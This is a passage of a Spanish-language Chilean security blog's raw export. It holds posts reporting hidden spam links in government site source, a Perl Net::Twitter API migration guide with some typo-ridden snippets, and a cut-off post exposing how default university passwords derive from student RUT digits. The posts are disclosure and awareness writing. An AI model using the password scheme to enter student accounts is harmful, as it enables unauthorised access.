<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXARyhLEc7WHxN74MEmA9-tpGSeraV4cQEUljmb6sIrfKPEmIG5gSskSuky8R2RXCZMZ7eVblHpktTfffkm8uGf9PEKvzXCe3zBck8MhiGq85YAm-iJiwGpBX1SFWAQ2mk4CipZhgvaS85/s1600/xs.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="72" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXARyhLEc7WHxN74MEmA9-tpGSeraV4cQEUljmb6sIrfKPEmIG5gSskSuky8R2RXCZMZ7eVblHpktTfffkm8uGf9PEKvzXCe3zBck8MhiGq85YAm-iJiwGpBX1SFWAQ2mk4CipZhgvaS85/s640/xs.png" width="640" /></a></div>
<br />shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-15144248072493383982013-08-02T07:13:00.002-07:002013-08-02T07:15:58.391-07:00Links Porno en Source de dellibertador .gob .cl<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxiXnvp9ZtB9XOGglGDPpCzb-xiKJ6BscTB10kjsNwMSA0WPSr55Q3JWVzyFiTANRRguQXoITbkbd_cwVKQC0xd7iSHWc1NYA3mOH4PDU6YH4sH4BvmnEULFHA8qiqlz3FBp419wzSFOdV/s1600/g0b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxiXnvp9ZtB9XOGglGDPpCzb-xiKJ6BscTB10kjsNwMSA0WPSr55Q3JWVzyFiTANRRguQXoITbkbd_cwVKQC0xd7iSHWc1NYA3mOH4PDU6YH4sH4BvmnEULFHA8qiqlz3FBp419wzSFOdV/s1600/g0b.png" /></a></div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Como se ha repetido últimamente en algunos sitios del Gobierno, han aparecido links a sitios pornos en el source del sitio dellibertador.gob.cl, muchas veces que no se ven reflejados en el sitio en si [display:none etc ], pero que buscan secuestrar tus clicks frecuentemente.<br /><br />Aqui un SS del Source:</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI7dSOQ4q2TqdTHVBXfmYNUC-_kqH_RN5MeMvQZR_y5SLWeD5sjiUq-t7OBexOXokXJ6nSrgpY89_L7ZvYG3xdRspzcja634mrwwDA3ni9TJ4J4EJzSPglsOghqtxJCtwevil8qiSL33BR/s1600/p0rn.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI7dSOQ4q2TqdTHVBXfmYNUC-_kqH_RN5MeMvQZR_y5SLWeD5sjiUq-t7OBexOXokXJ6nSrgpY89_L7ZvYG3xdRspzcja634mrwwDA3ni9TJ4J4EJzSPglsOghqtxJCtwevil8qiSL33BR/s1600/p0rn.png" width="640" /></a></div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">// Reportado.</span>shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-24487590639493816352013-06-28T08:33:00.000-07:002013-06-28T08:33:14.072-07:00[5ta vez] Página de la JUNJI con links de Porno<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirpGN32FSeLQ3qzcuwn5lCkLSl1-GAQM0OcrHhIrksj7v8MzpzAJjKDyzGCrvonQVOeda-XNj6fU3kTS74T5Hi0CMxRKDfH-N9U4Wt8q2O3rsAMdSCCoXFQjrbfcHNzD7BuBSJhFuVA_zA/s500/looog.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirpGN32FSeLQ3qzcuwn5lCkLSl1-GAQM0OcrHhIrksj7v8MzpzAJjKDyzGCrvonQVOeda-XNj6fU3kTS74T5Hi0CMxRKDfH-N9U4Wt8q2O3rsAMdSCCoXFQjrbfcHNzD7BuBSJhFuVA_zA/s500/looog.jpg" height="247" width="400" /></a></div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">De la SAGA: Hey Junji !<br />Presentamos por 5ta vez : Junji tienes links de Pornografía!<br /><br />Dejándose de bromas, es 5ta vez que informo de presencia de links de pornografia en el sitio de la JUNJI CHILE, es procupante que esto se este repitiendo una y otra vez debido a que las soluciones que se están ejecutando son solo temporales borrando los links y no corrigiendo el origen del problema.<br /><br />Timeline:</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="background-color: black; color: white; font-family: 'Courier New', Courier, monospace; font-size: 13px; line-height: 18px;"><b>Primera denuncia:(octubre-2012)</b> <a href="http://blog.xshinee.cl/2012/10/sitio-web-de-la-junji-con-enlaces-porno.html" style="color: #444444; text-decoration: none;">http://blog.xshinee.cl/2012/10/sitio-web-de-la-junji-con-enlaces-porno.html</a></span><br style="background-color: black; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;" /><span style="background-color: black; color: white; font-family: 'Courier New', Courier, monospace; font-size: 13px; line-height: 18px;"><b>Segunda denuncia:(diciembre 2012)</b> <a href="http://blog.secureless.org/noticias/chile-sitio-web-de-la-junji-elnazando-a-sitio-web-xxx/" style="color: #444444; text-decoration: none;">http://blog.secureless.org/noticias/chile-sitio-web-de-la-junji-elnazando-a-sitio-web-xxx/</a></span><br style="background-color: black; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;" /><span style="background-color: black; color: white; font-family: 'Courier New', Courier, monospace; font-size: 13px; line-height: 18px;">Tercera denuncia: ( Enero-2013) <a href="http://blog.xshinee.cl/2013/01/nuevamente-links-de-pornografia-en.html" style="color: #444444; text-decoration: none;">http://blog.xshinee.cl/2013/01/nuevamente-links-de-pornografia-en.html</a></span><br />
<span style="font-family: Courier New, Courier, monospace;">Cuarta denuncia: (abril-2013): <a href="http://blog.xshinee.cl/2013/04/4ta-vez-pagina-de-la-junji-con-links.html">http://blog.xshinee.cl/2013/04/4ta-vez-pagina-de-la-junji-con-links.html</a></span><br />
<br />
<br />
La imagen para esta 5ta Vez:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ50gLC9In7Pb2KI_w2aGHv6TYtIyW8eHWYUxyQOhqLlfwcAF6cnzzP2ZC0J5faWiTM_r2vqZeZ7XHHhV552uhD9LXkq8Wj0aH3nIbYIbW3WmUBt21Axi_IJarjrj3EzwkoDluwSv2_nBG/s1080/junji.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ50gLC9In7Pb2KI_w2aGHv6TYtIyW8eHWYUxyQOhqLlfwcAF6cnzzP2ZC0J5faWiTM_r2vqZeZ7XHHhV552uhD9LXkq8Wj0aH3nIbYIbW3WmUBt21Axi_IJarjrj3EzwkoDluwSv2_nBG/s1080/junji.png" height="12" width="640" /></a></div>
<br />shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com1tag:blogger.com,1999:blog-7067370504470948159.post-53727945658255445172013-06-22T08:57:00.002-07:002013-06-22T09:00:03.688-07:00Migrando Módulo Net::Twitter hacia API Twitter v1.1<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjf-psoz6HZV90gCSyyul9a0t9Df0hA58RaO62AnYEVZy520cr1lN2olQNtn2eMjKLHIU5EGglOVYkOtz8OfzO3122Zc8D6_p6g_TH4vgVyQ038_qW25rbgUGJhhIZ9OIC9-XD_y1DSNl3K/s1600/Perl.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjf-psoz6HZV90gCSyyul9a0t9Df0hA58RaO62AnYEVZy520cr1lN2olQNtn2eMjKLHIU5EGglOVYkOtz8OfzO3122Zc8D6_p6g_TH4vgVyQ038_qW25rbgUGJhhIZ9OIC9-XD_y1DSNl3K/s320/Perl.jpg" width="320" /></a></div>
<br />
<span style="font-family: Courier New, Courier, monospace;">Para quienes usamos Perl día a día para simplificar algunas tareas y automatizar un poco, es que va destinado esta entrada sobre el Modulo de Net::Twitter y su migración desde la API de Twitter v1 hacia la v1.1</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br />
Muchas veces usamos perl para programar bots que repitan mensajes aleatorios, o algo tan simple como twittear desde la linea de comando de forma rápida o hasta para monitorizar a distancia.<br /><br />En fin muchos se habrán dado cuenta que sus codes asociados a la API de twitter a dejado de funcionar debido al cambio de API a la versión 1.1 <br /><br />Aquí dejo los pasos para migrar de forma exitosa y volver a tener rodando nuestros queridos codigos.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br />
<br />
<br />
<u><br /><span style="font-size: large;">
SYNOPSIS</span></u></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br />
<br />
<br />
<br />
</span><br />
<pre class="brush: Perl"><span style="font-family: Courier New, Courier, monospace;">use Net::Twitter
my $nt = Net::Twitter->new(
traits => [qw/API::RESTv1_1/],
consumer_key => $consumer_key,
consumer_secret => $consumer_secret,
access_token => $access_token,
access_token_secret => $access_token_secret,
);
</span></pre>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="background-color: black; color: white; font-family: Courier New, Courier, monospace; font-size: large;">DESCRIPCION</span><br />
<span style="background-color: black; color: white;"><span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace;">Net :: Twitter antes de la versión 4.0 utiliza la API de Twitter de la versión 1. Ahora el API de Twitter v1.1 introdujo cambios que no son completamente compatibles hacia atrás, lo que requiere algunos cambios en el código de llamada.</span></span></span><br />
<span style="line-height: 21px;"><span style="background-color: black; color: white; font-family: Courier New, Courier, monospace;">Net::Twitter intenta siempre que la compatibilidad con versiones anteriores sea posible. En este documento se explica los cambios necesarios que debemos aplicar en el codigo de la nuestra aplicación para que pueda funcionar el Modulo Net::Twitter con la API de twitter version 1.1.</span></span><br />
<span style="background-color: black; color: white;"><span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span>
<span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span>
<span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace; font-size: large;">LO PRIMERO</span></span></span><br />
<span style="background-color: black; color: white;"><span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span>
<span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace; font-size: large;"><b>Incluir API::RESTv1_1</b></span></span></span><br />
<span style="line-height: 21px;"><span style="background-color: black; color: white; font-family: Courier New, Courier, monospace;"><br /><br />Cada vez que creamos objeto en Net::Twitter llamando un new , debemos reemplazar API::REST y dejarlo como API::RESTv1_1 . <i><b><u>Para la mayoria de las aplicaciones esto es todo lo necesario.</u></b></i></span></span><br />
<span style="background-color: black; color: white;"><span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span>
<span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace; font-size: large;"><u>EXCEPCIONES</u></span></span></span><br />
<span style="background-color: black; color: white;"><span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span>
<span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace;">La característica <i>Ratelimit</i> es incompatible con el API::RESTv1_1</span></span></span><br />
<span style="background-color: black; color: white;"><span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span>
<span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace;">La caracteristica <i>Ratelimit</i> es incompatible con el API::RESTv1_1 . Rate limiting es uno de los cambios mas grandes en la versión 1.1. En la v1 habia dos tipos de rate limit, uno para direcciones IP para llamadas no autenticadas y otro para usuario/aplicación para llamadas autenticadas. En la versiones 1.1 cada llamada debe estar autenticada y cada endpoint de la API ( i.e: Cada metodo ) tiene su rate limit. Los nuevos rate limits operan en una ventana de 1 hora.</span></span></span><br />
<span style="background-color: black; color: white;"><span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span>
<span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace;">Si tu codigo actualmente utiliza RateLimit tendrás que escribir código personalizado proporcionar una funcionalidad equivalente.</span></span></span><br />
<span style="background-color: black; color: white;"><span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span>
<span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span>
<span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace; font-size: large;">rate_limits_status</span></span></span><br />
<span style="background-color: black; color: white;"><span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span>
<span style="line-height: 21px;"><span style="font-family: Courier New, Courier, monospace;">El valor de retorno para rate_limits_status es totalmente diferente. Consulte la documentación de la <a href="https://dev.twitter.com/docs/api/1.1/get/application/rate_limit_status" target="_blank">API de Twitter rate_limit_status</a> para más detalles.</span></span></span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<dt id="blocking" style="border: 0px; line-height: inherit; margin: 5px; padding: 5px; vertical-align: baseline;"><span style="background-color: black; color: white; font-family: Courier New, Courier, monospace; font-size: large;"><b>blocking</b></span></dt>
<dd style="border: 0px; line-height: 19px; margin: 5px; padding: 5px; vertical-align: baseline;"></dd>
<dt id="blocking_ids" style="border: 0px; line-height: inherit; margin: 5px; padding: 5px; vertical-align: baseline;"><span style="background-color: black; color: white; font-family: Courier New, Courier, monospace; font-size: large;"><b>blocking_ids</b></span></dt>
<dd style="border: 0px; line-height: 19px; margin: 5px; padding: 5px; vertical-align: baseline;"></dd>
<dt id="friends" style="border: 0px; line-height: inherit; margin: 5px; padding: 5px; vertical-align: baseline;"><span style="background-color: black; color: white; font-family: Courier New, Courier, monospace; font-size: large;"><b>friends</b></span></dt>
<dd style="border: 0px; line-height: 19px; margin: 5px; padding: 5px; vertical-align: baseline;"></dd>
<dt id="followers" style="border: 0px; line-height: inherit; margin: 5px; padding: 5px; vertical-align: baseline;"><span style="background-color: black; color: white; font-family: Courier New, Courier, monospace; font-size: large;"><b>followers</b></span></dt>
<dt id="followers" style="border: 0px; line-height: inherit; margin: 5px; padding: 5px; vertical-align: baseline;"><span style="background-color: black; color: white; font-family: Courier New, Courier, monospace;"><br /></span></dt>
<dt id="followers" style="border: 0px; margin: 5px; padding: 5px; vertical-align: baseline;"><span style="background-color: black; color: white; font-family: Courier New, Courier, monospace;">Con API v1.1, estos métodos utilizan <i> cursor</i>. Si usted no pasa un parámetro <i>cursor</i>, Twitter asume <i>cursor => -1></i>. </span></dt>
<dt id="followers" style="border: 0px; margin: 5px; padding: 5px; vertical-align: baseline;"><span style="background-color: black; color: white; font-family: Courier New, Courier, monospace;">EL código existente que espera un valor de retorno arrayref debe ser modificado para esperar uno hashref y eliminar la referencia del slot <i>users.</i></span></dt>
<br />
<pre class="brush: Perl"># With API v1
my $r = $nt->friends;
my @friends = @$r;
# With API v1.1
my $r = $nt->friends;
my @friends = @{$r->{users}};
</pre>
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: large;"><b>Search</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">El método de búsqueda y el valor de retorno son sustancialmente diferentes entre Twitter API v1 y v1.1. En v1, búsqueda fue proporcionada por la característica API::Search . En v1.1, <i>search </i>se incluye en la característica API::RESTv1_1.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">En primer lugar, debemos eliminar API::Search de sus llamadas a <i>new. </i>La caracteristica API::Search es incompatible con la API::RESTv1_1.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">En v1, Twitter ha devuelto un hashref con varias teclas que contienen los metadatos. El conjunto actual de resultados se encuentra en el slot <i>results</i>:</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<pre class="brush: Perl"># With Twitter API v1
my $nt = Net::Twitter->new(traits => [qw/API::REST API::Search/]);
my $r = $nt->search('perl hacker');
for my $status ( @{$r->{results} ) {
# process each status...
}
</pre>
<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">Version 1.1 devuelve un hash con 2 slots: <i>search_metadata</i> and <i>statuses</i></span><br />
<span style="font-family: Courier New, Courier, monospace;"><i><br /></i></span>
<span style="font-family: Courier New, Courier, monospace;"><i><br /></i></span>
<br />
<pre class="brush: Perl"># With Twitter API v1.1
my $nt = Net::Twitter->new(traits => [qw/API::RESTv1_1/], %oauth_credentials);
my $r = $nt->searh('perl hacker');
for my $status ( @{$r->{statuses} ) {
# process each status...
}
</pre>
<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">Desplazamiento por los resultados de búsqueda funciona de forma diferente en v1.1. En v1, Twitter ofrece un parámetro <i>page</i>:</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<pre class="brush: Perl"># With Twitter API v1
for ( my $page = 1; $page <= 10; ++$page ) {
my $r = $nt->search({ q => $query, page => $page, rpp => 100 });
last unless @{$r->{results}};
# process a page of results...
}
</pre>
<br />
<span style="background-color: black; color: white;"><br /></span>
<span style="background-color: black; color: white;"><span style="font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 21px;">En la v1.1, se usa </span><code style="border: 0px; font-size: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">max_id</code><span style="font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 21px;"> y </span><code style="border: 0px; font-size: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">count</code><span style="font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 21px;"> para obtener los resultados:</span></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 21px;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 21px;"><br /></span>
<br />
<pre class="brush: Perl"># With Twitter API v1.1
for ( my %args = ( q => $query, count => 100 ), my $n = 0; $n < 1000; ) {
my $r = $nt->search({ %$args });
last unless @{$r->{statuses}};
$args{max_id} = $r->{statuses}[-1]{id} - 1;
$n += @{$r->{statuses}};
# process a page of results...
}
</pre>
<span style="background-color: black; color: white;"><br /></span>
<span style="background-color: black; color: white;"><br /></span>
<span style="background-color: black; border: 0px; color: white; font-family: Courier New, Courier, monospace; font-size: large; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><u><span style="color: white;">M</span>ETODOS DESAPOBRADOS</u></span><br />
<div style="border: 0px; line-height: inherit; margin: 5px; padding: 5px; vertical-align: baseline;">
<span style="background-color: black; color: white; font-family: Courier New, Courier, monospace;">algunos metodos de la API v1 de Twitter no estan disponibles para la v1.1:</span></div>
<dl style="border: 0px; margin: 5px; padding: 5px; vertical-align: baseline;">
<dt id="friends_timeline" style="border: 0px; font-style: inherit; font-variant: inherit; font-weight: bold; line-height: inherit; margin: 5px; padding: 5px; vertical-align: baseline;"><span style="background-color: black; color: white; font-family: Courier New, Courier, monospace;">friends_timeline</span></dt>
<dd style="border: 0px; font-variant: inherit; line-height: inherit; margin: 5px; padding: 5px; vertical-align: baseline;"><div style="border: 0px; font-variant: inherit; line-height: inherit; margin: 5px; padding: 5px; vertical-align: baseline;">
<span style="background-color: black; color: white; font-family: Courier New, Courier, monospace;"><span style="font-style: inherit;">usar </span><code style="border: 0px; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><i>home_timeline</i></code><span style="font-style: inherit;"> en cambio</span></span></div>
</dd>
<dt id="friendship_exists" style="border: 0px; font-style: inherit; font-variant: inherit; font-weight: bold; line-height: inherit; margin: 5px; padding: 5px; vertical-align: baseline;"><span style="background-color: black; color: white; font-family: Courier New, Courier, monospace;">friendship_exists</span></dt>
<dd style="border: 0px; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 5px; padding: 5px; vertical-align: baseline;"></dd>
<dt id="relationship_exists" style="border: 0px; font-style: inherit; font-variant: inherit; font-weight: bold; line-height: inherit; margin: 5px; padding: 5px; vertical-align: baseline;"><span style="background-color: black; color: white; font-family: Courier New, Courier, monospace;">relationship_exists</span></dt>
<dd style="border: 0px; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 5px; padding: 5px; vertical-align: baseline;"></dd>
<dt id="follows" style="border: 0px; font-style: inherit; font-variant: inherit; font-weight: bold; line-height: inherit; margin: 5px; padding: 5px; vertical-align: baseline;"><span style="background-color: black; color: white; font-family: Courier New, Courier, monospace;">follows</span></dt>
<dd style="border: 0px; margin: 5px; padding: 5px; vertical-align: baseline;"><div style="border: 0px; margin: 5px; padding: 5px; vertical-align: baseline;">
<span style="background-color: black; color: white; font-family: Courier New, Courier, monospace;"><i style="font-variant: inherit; line-height: inherit;"><code style="border: 0px; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">friendship_exist</code><code style="border: 0px; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">s</code></i><span style="font-style: inherit; font-variant: inherit; line-height: inherit;"> y sus alias no </span><span style="line-height: 19px;">están</span><span style="font-style: inherit; font-variant: inherit; line-height: inherit;"> soportados en API v1.1. Debes usar </span><code style="border: 0px; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><i>show_friendship</i></code><span style="font-style: inherit; font-variant: inherit; line-height: inherit;"> en cambio:</span></span></div>
<div style="border: 0px; font-variant: inherit; line-height: inherit; margin: 5px; padding: 5px; vertical-align: baseline;">
<span style="font-family: Courier New, Courier, monospace;"><span style="font-style: inherit;"><br /></span></span></div>
</dd></dl>
<pre class="brush: Perl">my $r = $nt->show_relationship({
source_screen_name => $user_a,
target_screen_name => $user_b,
});
if ( $r->{relationship}{source}{following} ) {
# $user_a follows $user_b
}
</pre>
<br />
<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">//FIN</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">## Twitter for all </span><br />
<span style="font-family: Courier New, Courier, monospace;">## <a href="https://metacpan.org/module/MMIMS/Net-Twitter-4.00003/lib/Net/Twitter/Manual/MigratingToV1_1.pod#Include-the-API::RESTv1_1-trait" target="_blank">Fuente original</a></span>shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-19634989072928745192013-05-14T19:55:00.002-07:002013-05-14T19:55:28.750-07:00Claves por Default en el 2013?<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjepswzz94jq6XXeNVpv98oGL8KFLZu8zLwbnxL5ekenwmNJsh064EEBY8UxYsdA_7RwPqSzNdGWDR6gHGp0KZzLsQ93eUhvbG0zJiVm-iTQPz_CVY6HgBqqQrYG0M0wGB6LcTOTOTQfwxK/s1600/password.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjepswzz94jq6XXeNVpv98oGL8KFLZu8zLwbnxL5ekenwmNJsh064EEBY8UxYsdA_7RwPqSzNdGWDR6gHGp0KZzLsQ93eUhvbG0zJiVm-iTQPz_CVY6HgBqqQrYG0M0wGB6LcTOTOTQfwxK/s1600/password.jpg" /></a></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<span style="font-family: Courier New, Courier, monospace;"><div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
Claves por default no es algo nuevo, la verdad es una de las formas más básicas de inseguridad en todos los tiempos. Entra entrada está motivada por la presencia de estas malas prácticas aun en el 2013 y donde sus consecuencias están subestimadas.</span><div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Podemos encontrar este problemas en distintas situaciones como:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<ul>
<li><span style="font-family: Courier New, Courier, monospace;">Modems / Routers</span></li>
<li><span style="font-family: Courier New, Courier, monospace;">WiFi ISP</span></li>
<li><span style="font-family: Courier New, Courier, monospace;">Passwords asociados a Jailbreak en IOS ( Alpine )</span></li>
<li><span style="font-family: Courier New, Courier, monospace;"><b><i>Cuentas personales en Intranet / colegios y Universidades.</i></b></span></li>
<li><span style="font-family: Courier New, Courier, monospace;">Claves de acceso físico</span></li>
<li><span style="font-family: Courier New, Courier, monospace;">y más.</span></li>
</ul>
</div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: large;"><i>Password en la Universidad .</i>. ?</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">*~ Conversando por ahí me di cuenta que algo que sucedía en algunas universidades es algo totalmente común para algunos. Algo preocupante porque mientras mas común es para la gente, mas se pueden aprovechar de estás fallas por lo que habrían mas víctimas.</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Al entrar a la universidad generalmente se nos asigna una cuenta generalmente del tipo : </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PrimerySegundoNombre.Apellido@Universidad.Dominio</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Si el RUT es: 12.34<b>5.678</b>-9 / claveDefault: <b>5678</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b> </b></span><span style="font-family: 'Courier New', Courier, monospace;">12.34</span><span style="font-family: 'Courier New', Courier, monospace;">5.<b>678</b></span><span style="font-family: 'Courier New', Courier, monospace;"><b>-9</b> / claveDefault: </span><b style="font-family: 'Courier New', Courier, monospace;">6789</b></div>
<div>
<b style="font-family: 'Courier New', Courier, monospace;"><br /></b></div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: large;"><i>Usos del Password..</i>?</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Los passwords en la universidad estan diseñados para:</span></div>
<div>
<ul>
<li><span style="font-family: 'Courier New', Courier, monospace;">ingresar al Intranet desde la web</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">acceder a tu </span><span style="font-family: Courier New, Courier, monospace;">información</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">ver horarios</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">estados de pago</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">Tomar asignaturas y sus horarios.</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">Imprimir en el Lab de Computación a tu Saldo Mensual. $$</span></li>
<li><span style="font-family: Courier New, Courier, monospace;">Ingresar al uso de pcs en el Lab de Computación.</span></li>
<li><span style="font-family: Courier New, Courier, monospace;">Acceso a tu cuenta de correo educacional</span></li>
</ul>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj8ke47L7ihygFJXrNE_h2DcQW7uW2VDC-lSbuRn2JGMUzrhlTY57ycvLITjE_AAgBBkSmAMQl5cFcHajeoVraonfQXlla_wsdFldrN22OKuvGZRCHqyr52Vs754vgFWaD9OiZIIpGF7ao/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj8ke47L7ihygFJXrNE_h2DcQW7uW2VDC-lSbuRn2JGMUzrhlTY57ycvLITjE_AAgBBkSmAMQl5cFcHajeoVraonfQXlla_wsdFldrN22OKuvGZRCHqyr52Vs754vgFWaD9OiZIIpGF7ao/s1600/images.jpg" /></a></div>
<div>
